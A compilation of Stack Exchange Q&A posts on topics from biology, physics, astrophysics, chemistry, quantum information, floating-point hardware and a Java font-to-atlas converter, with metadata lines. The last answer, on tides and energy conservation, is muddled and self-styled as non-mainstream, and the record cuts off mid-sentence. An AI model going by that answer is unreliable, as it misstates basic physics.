Question: I keep seeing this gene diagram, and I am not sure how to interpret it. I don't know what this diagram is called or where it was first depicted, but in the second picture, I have labeled it with what I think are the correct regions. Unlabeled Labeled If the labels are correct, does this mean that an open reading frame (and consequently, the CDS) does not have to begin at exon 1? If the labels are not correct, could you make some suggestions on how to fix the mistakes or point me towards some resource for interpreting this diagram? Answer: My professor got back to me and said my diagram is correct -- and that allows me to answer my second question: an ORF does not have to begin in the first exon. (The UCSC Genome Browser uses a similar format to display genes.)
{ "domain": "biology.stackexchange", "id": 10672, "tags": "genetics, dna, proteins, dna-sequencing, genomics" }
Instantaneous speed x instantaneous velocity
Question: Related to Distinguish between instantaneous speed and instantaneous velocity I understand that the average velocity is given by the displacement divided by the change in time, and it is a vector quantity. Similarly, the average speed is given by the distance traveled divided by the change in time, and it is a scalar quantity. I am also aware that the instantaneous speed is the magnitude of the instantaneous velocity. However, I am unsure how to prove this relationship using the average formulas mentioned above. How can we show that the infinitesimal displacement has the same magnitude as the infinitesimal distance traveled? I mean, prove that $|\lim_{\Delta t\to 0} \frac{displacement}{\Delta t}|=\lim_{\Delta t\to 0} \frac{distance\,traveled}{\Delta t}$. This is analogue to discuss why, with a decreasing time interval, we obtain, in the limit, the instantaneous scalar acceleration, which is precisely the magnitude of the instantaneous vector acceleration. Thank you. Answer: If A and B are two points with a finite separation on the path of a moving particle, the segment of path between these points need not be straight, so, for this segment: $$\text{distance gone}\geq \text {|displacement|}.$$ Dividing by the time taken to go from A to B we have, $$\text{speed}\geq \text {|velocity|}.$$ However as we take B closer and closer to A the segment of path approaches a straight line, so the distance is the same as the magnitude of the displacement, and the $\geq$ becomes simply = in both relationships.
{ "domain": "physics.stackexchange", "id": 100134, "tags": "vectors, velocity, speed" }
Logarithmic Spiral arms in the Milky Way
Question: I am trying to model the magnetic field of the inner 'disk' of the Milky Way Galaxy. I am following the model of Jansson and Farrar 2012. In section 5.1.1 of this paper they describe the Milky Way as 8 logarithmic spiral regions with opening angle $i = 11.5^{\circ}$. In this case, in cylindrical coordinates $(r,\phi,z)$ the dividing lines between these spiral regions is given by $$ r = r_x \, \text{exp}(\phi \, \text{tan}(90 - i))$$ where $r_x$ is a constant for each spiral arm. I am confused as to how this equation can describe a full rotation of a spiral arm. For a whole rotation $\phi = 2 \pi$ and so $\text{exp}(\phi \, \text{tan}(90 - i)) \approx e^{30} \approx 10^{13}$. But surely the radius of a spiral arm in the MW does not change by such a huge factor?! I feel that I am missing something here, and any guidance for what it is would be greatly appreciated. Thanks Answer: Look at the model in context. In the sentence before giving the values for $r_{-x}$ (which you've written as $r_x$), the authors write Between radii 5 kpc and 20 kpc there are eight logarithmic spiral regions with opening angle $i = 11.5^{\circ}$. In other words, the model really only has physical meaning for 5 kpc < $r$ <20 kpc. Some other things to take into account: This model is only valid for a certain region. While logarithmic spirals can indeed describe spiral arms well, they aren't successful for all values of $r$. For example, they fail to describe the inner region of the disk (i.e. 3-5 kpc). Spiral arms aren't always regular. We don't have a fantastic understanding of the spiral arms of the Milky Way. The 2-arm and 4-arm models are constantly competing with one another, and some minor arms (e.g. the Far 3 kpc Arm; see Dame & Thaddeus (2008)) have been discovered recently. The important message here, though, is that the spiral arms are limited to main part of the galactic disk, which does not extend to such great distances.
{ "domain": "physics.stackexchange", "id": 28915, "tags": "astrophysics" }
Convert Bitmap Font to Texture Atlas
Question: I wanted to render the textures that comprise a bitmap font glyph onto the screen directly as an Image in libGDX. When you make a bitmap font using a program (such as Hiero), it generates a text readable .fnt file along with a .png file that is the sprite sheet for the font. The only thing missing is a matching .atlas file to tell the location of the textures in that .png. This program takes a .fnt file as input and outputs a .atlas file that can be used with libGDX (and any engines that use the same type of atlas file). It parses the font file to find the names of the textures and their location on the sprite sheet. One reason I am seeking feedback is that this is the first program/code that I have put on Github with the intention of other people using it. It would be interesting to hear whether there are enough comments and enough documentation for others to understand and use software. Launcher.java public class Launcher { /** * The file name for the atlas generator must be passed in * without a file extension. */ public static void main(String[] args) throws IOException { String fileName = "test_dos437"; new FntToAtlasGenerator(fileName); } } FntToAtlasGenerator.java /** * The idea is to pass in the name of a .fnt file generated by Hiero * This program will generate a .atlas file that is compatible with libGDX * Next put the .atlas file and the .png that comes along with the .fnt file * into the android/assets folder of your libGDX project. * * @author baz * */ public class FntToAtlasGenerator { List<GlyphData> glyphs = new ArrayList<GlyphData>(); public FntToAtlasGenerator(String fileName) throws IOException { //String fileName = "test_dos437"; String inputDir = "input/"; String outputDir = "output/"; String extension = ".fnt"; String atlasExtension = ".atlas"; FileReader fontReader = new FileReader(inputDir + fileName + extension); BufferedReader reader = new BufferedReader(fontReader); reader.readLine(); //info line String commonLine = reader.readLine(); String pageLine = reader.readLine(); reader.readLine(); //chars line String line = reader.readLine(); while(line != null) { this.addLineToGlyphs(line); line = reader.readLine(); } reader.close(); PrintWriter writer = new PrintWriter(outputDir + fileName + atlasExtension, "UTF-8"); //values read from .fnt file String fileNameForAtlas = this.getFileNameForPageLine(pageLine); String size = this.getSizeForCommonLine(commonLine); //default values String format = "RGBA8888"; String filter = "Nearest, Nearest"; String repeat = "none"; this.writeOpeningLines(writer, fileNameForAtlas, size, format, filter, repeat); for (GlyphData glyph : this.glyphs) { this.writeGlyph(glyph, writer); } writer.close(); } private void writeOpeningLines(PrintWriter writer, String fileName, String size, String format, String filter, String repeat) { writer.println(fileName); writer.println("size: " + size); writer.println("format: " + format); writer.println("filter: " + filter); writer.println("repeat: " + repeat); } /** * The name will be a string that is the integer of the character in ASCII * The idea is that you can get the integer value of a character in a string * and then render its image to the screen */ private void writeGlyph(GlyphData glyph, PrintWriter writer) { String stringOffset = " "; //two spaces for lines after name writer.println(glyph.id); //name writer.println(stringOffset + "rotate: false"); writer.println(stringOffset + "xy: " + glyph.x + ", " + glyph.y); writer.println(stringOffset + "size: " + glyph.width + ", " + glyph.height); writer.println(stringOffset + "orig: " + glyph.width + ", " + glyph.height); writer.println(stringOffset + "offset: " + glyph.xoffset + ", " + glyph.yoffset); writer.println(stringOffset + "index: -1"); } private String getFileNameForPageLine(String pageLine) { String[] fragments = pageLine.split(" "); String nameString = fragments[2]; return nameString.replace("file=", "").replace("\"", ""); } private String getSizeForCommonLine(String commonLine) { String[] fragments = commonLine.split(" "); String widthString = fragments[3]; widthString = widthString.replace("scaleW=", ""); String heightString = fragments[4]; heightString = heightString.replace("scaleH=", ""); return widthString + "," + heightString; } private void addLineToGlyphs(String lineString) throws IOException { if (lineString != null) { String[] lineFragments = lineString.split(" "); List<String> formattedStrings = new ArrayList<String>(); //remove new line, space, and return characters //because there are wacky spaces in between the text of the .fnt file //and when you split on space, it adds new line type characters if (lineFragments[0].equals("char")) { for (int i = 0; i < lineFragments.length; i++) { String string = lineFragments[i]; string = string.replace(" ", ""); string = string.replace("\n", ""); string = string.replace("\r", ""); //cant just reassign, because we need to remove empties //and we want to directly assign based on index because we know the format if (!(string.equals(" ") || string.equals("\n") || string.equals("\r") || string.isEmpty())) { formattedStrings.add(string); } } /* for (String string : formattedStrings) { System.out.println(string); } */ GlyphData data = new GlyphData(formattedStrings); this.glyphs.add(data); } } } } //example input /* info face="Pescadero" size=20 bold=1 italic=0 charset="" unicode=0 stretchH=100 smooth=1 aa=1 padding=2,2,2,2 spacing=2,2 common lineHeight=31 base=19 scaleW=256 scaleH=256 pages=1 packed=0 page id=0 file="pescadero-blackWhite-20.png" chars count=94 char id=32 x=0 y=0 width=0 height=0 xoffset=0 yoffset=19 xadvance=13 page=0 chnl=0 char id=124 x=0 y=0 width=7 height=26 xoffset=2 yoffset=2 xadvance=17 page=0 chnl=0 char id=92 x=7 y=0 width=14 height=25 xoffset=-2 yoffset=2 xadvance=14 page=0 chnl=0 char id=47 x=21 y=0 width=14 height=25 xoffset=-2 yoffset=2 xadvance=14 page=0 chnl=0 char id=106 x=35 y=0 width=10 height=24 xoffset=-2 yoffset=4 xadvance=12 page=0 chnl=0 char id=81 x=45 y=0 width=22 height=23 xoffset=-1 yoffset=4 xadvance=23 page=0 chnl=0 char id=74 x=67 y=0 width=12 height=23 xoffset=-2 yoffset=3 xadvance=13 page=0 chnl=0 char id=93 x=79 y=0 width=10 height=22 xoffset=-2 yoffset=3 xadvance=13 page=0 chnl=0 char id=91 x=89 y=0 width=10 height=22 xoffset=0 yoffset=3 xadvance=13 page=0 chnl=0 char id=41 x=99 y=0 width=11 height=22 xoffset=-2 yoffset=4 xadvance=13 page=0 chnl=0 char id=40 x=110 y=0 width=11 height=22 xoffset=-1 yoffset=4 xadvance=13 page=0 chnl=0 char id=112 x=121 y=0 width=16 height=22 xoffset=-2 yoffset=7 xadvance=18 page=0 chnl=0 kearnings count = -1 */ //example output /* texturePackResize22.png size: 1784,1498 format: RGBA8888 filter: Nearest,Nearest repeat: none arco01 rotate: false xy: 164, 326 size: 160, 318 orig: 160, 318 offset: 0, 0 index: -1 arco02 rotate: false xy: 326, 752 size: 160, 318 orig: 160, 318 offset: 0, 0 index: -1 arco03 rotate: false xy: 488, 1178 size: 160, 318 orig: 160, 318 offset: 0, 0 index: -1 */ GlyphData.java public class GlyphData { public final String character; public final String id; public final String x; public final String y; public final String width; public final String height; public final String xoffset; public final String yoffset; public final String xadvance; public final String page; public final String chnl; public GlyphData(List<String> glyphDataFragments) { //preserving all non white space elements of the char line of the .fnt file //some of the data may be needed later //im leaving this block in so it is clear which are currently unused String character = glyphDataFragments.get(0); //keyword for font language String id = glyphDataFragments.get(1); String x = glyphDataFragments.get(2); String y = glyphDataFragments.get(3); String width = glyphDataFragments.get(4); String height = glyphDataFragments.get(5); String xoffset = glyphDataFragments.get(6); String yoffset = glyphDataFragments.get(7); String xadvance = glyphDataFragments.get(8); String page = glyphDataFragments.get(9); String chnl = glyphDataFragments.get(10); this.id = id.replace("id=", ""); this.x = x.replace("x=", ""); this.y = y.replace("y=", ""); this.width = width.replace("width=", ""); this.height = height.replace("height=", ""); this.xoffset = xoffset.replace("xoffset=", ""); this.yoffset = yoffset.replace("yoffset=", ""); //unused this.character = character; this.xadvance = xadvance; this.page = page; this.chnl = chnl; } } When you place the generated .atlas file and .png file in the android/assets folder of the libGDX project and create a TextureAtlas object from the atlas file, you can access the TextureRegions according to the ASCII integer value of the character. For example, 70 is equal to capital F. Then you can create an Image object from the TextureRegion and use it like you would use any other sprite. Here is the usage in libGDX: Map<Integer, TextureRegion> textures = new HashMap<Integer, TextureRegion>(); TextureAtlas atlas = new TextureAtlas("bitmapfont.atlas"); final Image charImage = new Image(this.libGDXGame.allTextures.get((int)character)); And a pretty picture of what is possible: I've put the project on Github for anyone to use. There are no dependencies, and the README explains how to use the program. Here is the link. Answer: Turning my comment into an answer by request. You should be able to do what you want by simply using the functionality already built into LibGDX. Caveat: I have not tried this, I just know that the class exists and it should be possible to extract the data you want from it, so: some assembly may be required on your part. LibGDX has functionality for loading and dealing with bitmapped fonts. See the documentation here. You can use the BitmapFont class to load the font data. It supports AngelCode BMFont formats. Hiero which you are using can output to BMFont. Create a new instance of the BitmapFont: BitmapFont bmf = new BitmapFont(Gdx.files.internal("data/myfile.bmf")); Then get the data backing the font: BitmapFont.BitmapFontData bmfdata = bmf.getData(); Get the Glyph for your wanted character, this contains the u/v coordinates for the glyph and which texture page it is on and some other goodies. Then get the correct texture page from the BitmapFont and use the u/v pairs to extract the texture region for your wanted glyph: BitmapFont.Glyph glyph = bmfdata.getGlyph(character); if(glyph == null){ // handle error: No glyph for character } else{ TextureRegion page = bmf.getRegion(glyph.page); TextureRegion glyphTexture = new TextureRegion(page.getTexture(), glyph.u, glyph.v, glyph.u2, glyph.v2); // Use glyphTexture to render, or store it somewhere. } Again, I have not tested this. You may have to fiddle around or use other properties of the glyph to get the wanted result. But the data you need is all in there, you just have to pry it out. The LibGDX documentation (and source code) is your friend.
{ "domain": "codereview.stackexchange", "id": 15360, "tags": "java, game, parsing, file, libgdx" }
Can we compare the vapour pressure of solutions whose concentrations and temperature is known?
Question: If we have some solutions, in which we know the temperature and concentration of the solute particles, can we compare their vapour pressures? Original question: Which solution has the highest vapour pressure among the following? a) $0.02 ~\pu M ~\ce{NaCl}$ at $50^{\circ}$C b) $0.03 ~\pu{M}$ sucrose at $15^{\circ}$C c) $0.005 ~\pu{M} ~\ce{CaCl_2}$ at $50^{\circ}$C d)$0.005~ \pu{M} ~ \ce{CaCl_2}$ at $25^{\circ}$C I answered this question by noting that at higher temperature and lower concentration, vapour pressure of solution should be the highest because more temperature implies more kinetic energy which means more volatility and low concentration means that the solute is less solvated so it forms less bonds with the solvent and therefore has more vapour pressure, so answer is c). Is this reasoning correct? Now I think that these options were set so that it becomes easy to compare. But what if I had options like $0.02 ~\pu M ~\ce{NaCl}$ at $50^{\circ}$C ,$0.03 ~\pu M~ \ce{NaCl}$ at $60^{\circ}$C, $0.005 ~\pu M ~\ce{CaCl_2}$ at $20^{\circ}$ C, how shall we compare their vapour pressures without doing experiments? Now, if there existed a relation between vapour pressure and concentratin or temperature, it would become easier. For example, relation between vapour pressure and temperature can be given by Antoine equation, but I want something that also incorporates the concentration in the equation also, so that by plugging in the values, it is easy to compare. I am also not sure, whether van't hoff factor will have a role in it or not. Answer: The point of the question is to test your understanding i. of Raoult's law (that increasing the solute concentration decreases the vapor pressure and that the identity of the solute is not important in an ideal solution; the mole fraction of solute determines $\Delta p$: $\Delta p = p-p^\circ = -\chi_\textrm{solute}p^\circ$ ii. that vapor pressure increases with T Other things you might want to remember are that molality and molarity are linearly proportional for dilute solutions (ie then $m \propto c_M$), and that ideality is approached for dilute solutions of small solutes (typically at low $\pu{mM}$ concentrations such as in this problem). You can answer the question based entirely on consideration of the van't Hoff factor to compute total concentrations, and by assuming that the vapor pressure increases with T. First compute effective total solute concentrations $im$ (equal to either the solute concentration for a non-dissociating solute such as sucrose, or the total ion concentration for the electrolyte solutions): $$\begin{array}{|c|c|c|} \hline \text{species} &T (\pu{^\circ C})& c_M (\pu{M})& i & ic_M(\pu{M}) \\\hline 1.~\ce{NaCl} & 50 & 0.02 & 2 & 0.04\\ 2.~\text{sucrose} & 15 & 0.02 & 1 & 0.02\\ 3.~\ce{CaCl2 } & 15 & 0.005 & 3 & 0.015\\ 4.~\ce{CaCl2 } & 50 & 0.005 & 3 & 0.015\\\hline \end{array}$$ Inspection should quickly eliminate all options but row 4 since they have a higher effective concentration at the same T, or since they are at a lower T at the same effective concentration. Actual vapor pressures are not stated in the problem. In the absence of that information there is no point in attempting to compare things in more detail, and that's not the point of the problem. However, provided Raoult's law holds it can be used to determine the change in vapor pressure regardless of T. Raoult's law assumes the identity of the solute does not matter, that the effect of added solute on the activity of solvent is entirely entropic (accounted for by ideal mixing entropy) and that the gas is ideal. In general, to predict vapor pressure at any T and solute concentration you need a model of the activity of the solvent as a function of the solute concentration, and of the activity in the gas phase. You can determine the vapor pressure by finding the conditions that render the activities identical.
{ "domain": "chemistry.stackexchange", "id": 15454, "tags": "physical-chemistry, solutions, vapor-pressure" }
Optical Waveguide Mode Profile
Question: SE, I have a question about a mode profile chart from Synopsis RSOFT. After following an example silicon Y-Splitter waveguide below with the waveguide width = 0.45um and height=0.22 um , I simulated the Ex, and Hy mode profile of the splitter, but I do not know how to read this graph. I always thought waveguide modes are only integers and are related to the standing waves inside of the waveguide. What am I missing here. Also what causes the shape of the mode profile, especially the Ex mode? Answer: The transverse electric field will not be continuous across the boundary because the Si and cladding have different polarizabilities. The discontinuity you see does not indicate a higher-order mode but rather results from the induced surface charge (think Gauss’ Law). If you’d like to see a continuous field profile, plot $\mathbf{D}$ instead, which takes into account the polarizability. Or, you could plot the $x$-component field in the $y$ direction.
{ "domain": "physics.stackexchange", "id": 79069, "tags": "optics, waveguide, photonics" }
What does z-transform imply?
Question: As z tranform is the transformation of discrete time signals into complex frequency domian. What do you get out of complex Stuff. As wikipedia calls it complex frequency domain. Why do you need it ? How to look at it, In order to understand it from the text? Answer: it's in the textbooks. here's a short synopsis: in continuous-time LTI systems, you have 3 fundamental classes of building blocks: scaler (multiply signal by a constant) adder (add signals) integrator (integrate signal w.r.t. time) the first two do not discriminate w.r.t. frequency. so you can't build a "filter" out of just the first two because there is nothing in that filter that responds differently for different frequencies. so you need the third class which we commonly use the label "$s^{-1}$" for. for discrete-time LTI systems, the first two classes are the same as for continuous time. you have scalers and adders. but the third class of fundamental processing block is different. the third class is a unit delay, a delay of one unit of discrete time and we call that "$z^{-1}$". that's how digital filters know the difference between one frequency and another.
{ "domain": "dsp.stackexchange", "id": 3235, "tags": "dsp-core, z-transform" }
Is tomography of the Choi state sufficient for channel tomography?
Question: Given that there is an isomorphism between quantum states and quantum channels (the Choi-Jamiolkowski isomorphism) and given that state tomography is well-researched, why is quantum process or quantum channel tomography an interesting research topic? Does it not follow trivially from state tomography and the Choi isomorphism? Specifically, let one do the following: Use $n$ copies of the channel and send one half of a max-entangled state through each copy. Performs state tomography on the $n$ i.i.d. output states. Knowing the Choi state, one has a description of the channel In 1), I am not sure if the setting of quantum channel tomography assumes access to the other half of the max-entangled state (that doesn't go into the channel) or not. Does this make a difference to the overall procedure? Answer: Sure, process tomography is intimately related to state tomography, and one way to see it is via the Choi isomorphism, as you point out. See also eg the discussion in section IV of (Mohseni et al. 2007). Although it would rephrase your steps more precisely as just saying that you use as input the maximally entangled state, send part of it through the channel, and perform state tomography of the (global) output state. This automatically implies that you send the input multiple times as that's just how state tomography works in general. But this only "trivially shows" that process tomography is possible if you can generate an entangled state, send part of it through the channel, and then perform tomographically complete measurements on the (generally entangled) outputs. Note that this approach would require to generate maximally entangled state of the form $\sum_{i=1}^d |i,i\rangle$ with $d$ the relevant state dimension. Not an easy task in general. There's plenty of things that this argument tells you nothing about. For one thing, you can also clearly do process tomography without this kind of scheme and without the need to use an ancillary space and entangled states between ancillary and input space. What you really need to do is characterise the linear map that the channel is, so send any basis (or more generally, any copmlete and linearly independent set) of input density matrices, and do tomography of the associated outputs. This information is necessary and sufficient to obtain a "tomographically complete" description of the channel. Using the Choi is a "trick" to do this, that allows to use a single input state, at the cost of it having to be highly entangled, and thus having to work with larger spaces etc. So, as to why "why is quantum process or quantum channel tomography an interesting research topic", that entirely depends on what one is interested in. There's an endless list of things one can study about this process that the above arguments tell you nothing about. What about the reconstruction efficiency in terms of required number of samples to have errors in a certain measure below a certain threshold with a certain probability? Which method is better from this point of view? Which set of input states is optimal from this point of view? What about robustness with respect to certain types of noise? Which methods will be better and which ones will be worse? What about all the problems associated with state tomography, such as the non-positivity of the estimated states you get when doing naive linear tomography? How do these transpose when you use these tomography methods for process tomography instead? How do you even quantify the quality of the estimated channel? There's many possible distances between channels that you can use, each one more suited for specific purposes. What about actual experimental implementations? What are the best experimental schemes to perform process tomography given the resources more easily available in different types of experimental platforms? These are just some of the possible issues that came to mind on the spot (probably all of these have been worked out in the literature, I don't know). You could go on for a while. See for example the paper linked above for a more detailed overview.
{ "domain": "quantumcomputing.stackexchange", "id": 4553, "tags": "quantum-state, quantum-operation, state-tomography, quantum-process-tomography" }
Interpretation: Galilean Transformation of Force Laws
Question: so my books says The transformation that allows us to go from one inertial frame $O$ with coordinates $x_i$ to another inertial frame $O'$ with coordinates $x_i'$ is the Galilean transformation. If the relative velocity of the two frames is given to be $\vec{v}=const$ and their relative orientations are specified by three angles $\alpha, \beta$ and $\gamma$, the new coordinates are related to the old ones by $x_i \to > x_i' = \mathbf{R}_{ij} x_j - v_it$, where $\mathbf{R}=\mathbf{R}(\alpha, \beta, \gamma)$ is the rotation matrix. In newtonian physics, the time coordinate is assumed to be absoute, i.e. it is the same in every coordinate framge. For the Galilean transformation, we are mainly interested in coordinate transformations among inertial frames with the same orientation, $\mathbf{R}(0,0,0)_{ij}=\delta_{ij}$. Such a transformation is called a (Galilean) boost: \begin{align} x_i \to x_i' &= x_i - v_it \tag{1.1}\\ t \to t' &= t \tag{1.2} \end{align} and it also states the velocity addition rule $u_i \to u_i' = u_i - v_i \tag{2}$ Now I wanted to solve the following problem: Newtonian relativity: Consider a few definite examples of Newtonian mechanics that are unchanged by the Galilean transformation of (1.1, 1.1) and (2): Show that force as given by the product of acceleration and mass $\vec{F}=m\vec{a}$, as well as a force law such as Newton's law of gravity $\vec{F}=G_n\frac{m_1m_2}{r^2}\hat{r}$ remain the same in every inertial frame. What I did is $F=ma=m\frac{d^2}{dt^2}x=m\frac{d^2}{dt'^2}(x'+vt)=m\frac{d^2}{dt'^2}x'=ma'$ Now assume $v$ only acts in x direction. I want to show that the $\vec{F}=G_n m_1m_2 \frac{1}{r^2}\hat{r}$ is the same in every inertial frame. So basically I want to show $\frac{1}{r^2}\hat{r} = \frac{1}{r'^2}\hat{r'}$ resp. $\frac{\vec{r}}{r^3}=\frac{\vec{r'}}{r'^3}$ $\frac{\vec{r}}{r^3}=\frac{1}{\sqrt{x^2+y^2+z^2}^3}\begin{pmatrix} x \\ y \\ z \end{pmatrix}=\frac{1}{\sqrt{(x'+vt)^2+y'^2+z'^2}^3}\begin{pmatrix} x'+vt \\ y' \\ z' \end{pmatrix}$ Now 1. works great. Everything seems fine but 2. doesn't work and I don't understand why it should work to begin with. Now 1. basically tells me: If I measure the force of a spring at home or in my car that moves with a constant velocity: I get the same result. Now what does 2. tell me? I interpret it like that: Assume we have a mini-earth that we can take with us. We take it to our room. We measure the gravitational force acting on some point mass in a specific location $\vec{x_0}$. We get some value. We then drive around in our car, again with a constant velocity and measure again: Same result. Now I think what I do in my attempt to proof 2. is fixing the earth. I leave it at home, sit in my car, drive around and try to measure stuff. I'm very very unsure though so I opted for a simpler example: Hook's Law. We have $F_h=-kx$. It's easy to imagine: If I squeeze my spring for $x=1m$ I get some kind of force that pushes back. It doesn't matter if I do that at home or in the car, so let's try to show that: $F_h=-kx=-k(x'+vt)\neq F_h' = -kx' \tag{3}$ So again, in 3 we basically leave the spring at home, no? How do I show that a force law doesn't change under Galilean transformation? Answer: I see two problems in your question. The first is that the force laws in both of your examples make certain assumptions: the quantities ($\mathbf{r}$ in the first example and $x$ in the second example) are not absolutes, they are distances measured from some origin which represents something physical. In the case of the gravitational force, the centre usually represents a "larger" mass (like the Sun in the solar system), while in the case of Hooke's law the centre represents the point at which the spring is attached. So the actual force laws that you should be considering (in the general case) are the following: Gravitational force: consider two masses $m_1$ and $m_2$ at positions $\mathbf{r}_1$ and $\mathbf{r}_2$ respectively. Then the force on $1$ due to $2$ is: $$\mathbf{F}_{12} = -\frac{Gm_1 m_2}{(\mathbf{r}_1 - \mathbf{r}_2)^2}\hat{\mathbf{r}}_{12}$$ The force on the mass attached to the end of the spring is $F = - k(x-x_0)$ where $x_0$ is the position of the point at which the spring is attached. Secondly, your interpretation of Galilean Invariance is not strictly correct. When you do a Galilean boost, you should imagine looking at the entire system as a whole from a moving car (or rocket, if you prefer). Therefore, you must boost all the relevant quantities, otherwise you're just giving one of them a velocity, and not the other, and that's certainly not the same thing as observing the system from a different inertial frame. That you are doing this is reflected in the fact that your answers aren't showing the equations to be invariant! Let's look at the second example to see this properly: if you observe the spring from a different frame of reference, the point at which it is fixed will also appear to be moving, and therefore you would have: \begin{align}x' &= x - vt\\x_0' &= x_0 - v t,\end{align} so that $x'-x_0' = x - x_0$, and you can easily show that the force law is invariant. See also this very similar question: Galilean invariance of Newton's universal gravitation law.
{ "domain": "physics.stackexchange", "id": 78071, "tags": "newtonian-mechanics, newtonian-gravity, coordinate-systems, inertial-frames, galilean-relativity" }
How does CPU determine Reserved Exponent cases?
Question: Using IEEE 754 algorithm i assume, that it can be implemented in a branchless way. But how does CPU determine special cases (Reserved Exponent values): Exponent Significand is 11111111 000000000... Inf 11111111 000001000... NaN 00000000 000000000... 0 00000000 000001000... Subnormal Without any tricks which i don't know / understand it should be expensive. EDIT It was too big for comment, so editing source question: I'm currently reading ARM spec/documentation https://developer.arm.com/documentation/ddi0403/d/Application-Level-Architecture/Application-Level-Programmers--Model/The-optional-Floating-point-extension/Floating-point-data-types-and-arithmetic?lang=en#BEIBFIBJ and especially interesting part is FPUnpack() pseudocode. If i understand correctly, CPU doesn't have intrinsics / instructions for special cases, but the compiler, that produce machine code should consider to validate result from registers (FVP for old ones and NEON for new). The example i found from ARM team https://github.com/ARM-software/ComputeLibrary/blob/8f587de9214dbc3aee4ff4eeb2ede66747769b19/include/CL/cl_half.h#L135. Am i right ? EDIT: Nope, i'm not right, according to this answer https://stackoverflow.com/questions/61646510/how-does-the-cpu-cast-a-floating-point-x87-i-think-value. But it's still the question how does CPU registers handle special cases... Answer: Not really. There are eight bits to check in two numbers usually to see there is a special case. For infinity/NaN you don’t need to do the normal operation anymore, so the rest is not time critical. More time critical is normalising the mantissa for a zero exponent. But there are processors that assumed these cases are so rare that many can be handled by an interrupt (not directly in hardware, but by executing code).
{ "domain": "cs.stackexchange", "id": 20050, "tags": "cpu, floating-point" }
Audio silence on 1.0
Question: I have audio files with silence on 1.0 (max amplitude). I attach an example of audio waveform. I don't know why it is on 1.0? How can I convert it to have silence on 0 (as usual)? I noted that at the beginning of the waveform it is starting from 0 and goes to 1.0 - any ideas why? The files are telephone recordings, they are sampled with 8kHz and coded with GSM. I don't have more information about recording procedure. Answer: In addition to Olli's suggestion, it might also be a by-product of the encoder's processing. Removing this offset would ammount to a simple removal of the DC component. This is practically done with a high pass filter with a cut-off (or rather pass-through) near zero Hertz. If you are working in Audacity, guessing by your screeshot, this is done by Effect->Normalise and from the window that pops up, make sure that you check "Remove DC Offset". In terms of digital signal processing, you can calculate the arithmetic mean of the whole sample and then subtract it from all values. (Please note: This is assuming a constant DC offset across the recording. If you also happen to have DC drift, it would be better to perform a "best line fit" to the whole sample and then subtract that estimation from the whole sample to "align" it back to zero.) Hope this helps.
{ "domain": "dsp.stackexchange", "id": 3365, "tags": "audio" }
The magnitude of taking discrete cosine transform of an image two times is similar to the original
Question: Consider the following: im = double(imread('lena.bmp')); subplot(1,3,1), imshow(im,[]), title('original'); t1 = dct2(im); subplot(1,3,2), imshow(log(abs(t1)+1),[]), title('DCT transform'); t2 = dct2(t1); subplot(1,3,3), imshow(t2,[]), title('DCT(DCT) transform'); the output is shown below: Could anyone explain why the result of the second order DCT is similar to the original image? Thanks in advance! P.S. The same thing happens with every 2N'th DCT. Answer: It's beacuse the inverse discrete fourier transform (DCT) is almost identical to the forward DCT. So taking twice the transform will be similar to the original signal. In fact if you provide which DCT type (DCT-I, DCT-II etc) you have used, one can show the effect more explicitly.
{ "domain": "dsp.stackexchange", "id": 4335, "tags": "dct, image-compression" }
how to make the map thicker? (gmaping params)
Question: I'm using the gmapping/slam_gmapping node to create the map using ros_arduino_bridge and neato_laser_driver with those the /odom , /scan, and /tf can be published. I referred the parameter configuration of rbx1: here and I found that: the map is drawn lightly. there are many emissive lines which is not as the reality and should be get rid of. Can you guys tell me which parameter of slam_gmapping influences these features? Thank You Very Much!! ps: I'm using the ros-indigo and neato_xv11 laser scanner. THX!! Originally posted by sonictl on ROS Answers with karma: 287 on 2016-11-03 Post score: 0 Original comments Comment by sonictl on 2016-11-03: The map did not get denser even I stay the robot at some position for 1 hour. Answer: The emissive lines typically come from laser scanner max range measurements. Some laser scanners map scan errors to max range as well, which could lead to this problem. I haven't worked with the neato myself, so I cannot tell if this is the problem here. Also, typically, you don't update the map if you don't move the robot. gmapping has three parameters when to trigger an update: linearUpdate angularUpdate temporalUpdate If you want to update also why standing still, you should set temporalUpdate to something else then -1.0 (default), which disables temporal updates. Originally posted by mgruhler with karma: 12390 on 2016-11-03 This answer was ACCEPTED on the original site Post score: 0 Original comments Comment by sonictl on 2016-11-17: thx mig! I think this problem may be not as so simple. If the map scan errors caused the emissive lines, there should be some black points appears at the end of the emissive lines, more or less. Neverthless, there is no black poit at all.
{ "domain": "robotics.stackexchange", "id": 26137, "tags": "navigation, gmapping" }
Perpetual Mobile and Gravitation
Question: I have fundamental question about what is called the “law of conservation of energy”. We all hear about the tidal power stations which using the tidal power. The source of the tidal power came from the changes in the gravity field between the moon and the earth. Allegedly, because of the law of conservation of energy this influence must cause to some energy lose in the moon or the earth. And indeed we know that the moon orbit get longer and slower over time. My question is, are we really must say that the energy of the tide and the loss of the kinetic energy of the moon are equal? According to the general relativity theory the gravitation is the time space curve effect of a big object. This curve is not “energy consuming”, which means basically - two objects can spin around each other in space forever even that such a spin is a change in momentum that should consume energy according to the classic theory. The question is did the tidal effects caused by that “miracle” eternity momentum changes are indeed “energy consuming”? Let's imagine that instead of the moon, there is black hole and the earth is spinning around it. This can cause to tidal power effects exactly like happen by the moon. This energy coming from the black hole which means that the black hole mass must be reduce according to the equation of $E=mc^2$. This is against what we know about black holes which are never losing any mass. But if the answer is “no” that mean in other words that the tidal power stations are kind of “Perpetuum Mobile” - creating energy from nothing. This is of course a weirder conclusion. Answer: My question is, are we really must say that the energy of the tide and the loss of the kinetic energy of the moon are equal? The answer is obviously "YES." It must be so. I would refer at this point these words; Nature is relentless and unchangeable, and it is indifferent as to whether its hidden reasons and actions are understandable to man or not.- Galileo Galilei Because the answer I have in my desk right now is (not yet) "Mainstream Physics", quite similarily as the thoughts of Galileo's wasn't either. You ask further; The question is did the tidal effects caused by that “miracle” eternity momentum changes are indeed “energy consuming”? Still; YES. Yet, the building of Tidal power stations shouldn't have any impact to this energy consumption. The very same energy would only be transferred to heat on viscous losses of water. So there is no need to argue against tidal power. There is no Perpetual Mobile, but one; the whole universe. And the existence of this "Perpetual Mobile" is proved by many. But no, Though two objects could theoretically spin in space forever, in reality they wont. They are loosing matter and thus also energy all the time. Slow but sure, down to the drain. Gas, fluid or solid, it doesn't matter. It all comes to an end. And this is the only thing that ever aloud the new start, and thus -development. Ps. The only thing which made Galileo's physics as a not Mainstream physics was the fact that he was at that point actually the only one who had very detailed observed certain phenomenons. I ie. encourage you to calculate the time which is needed to stop the rotation, if tides 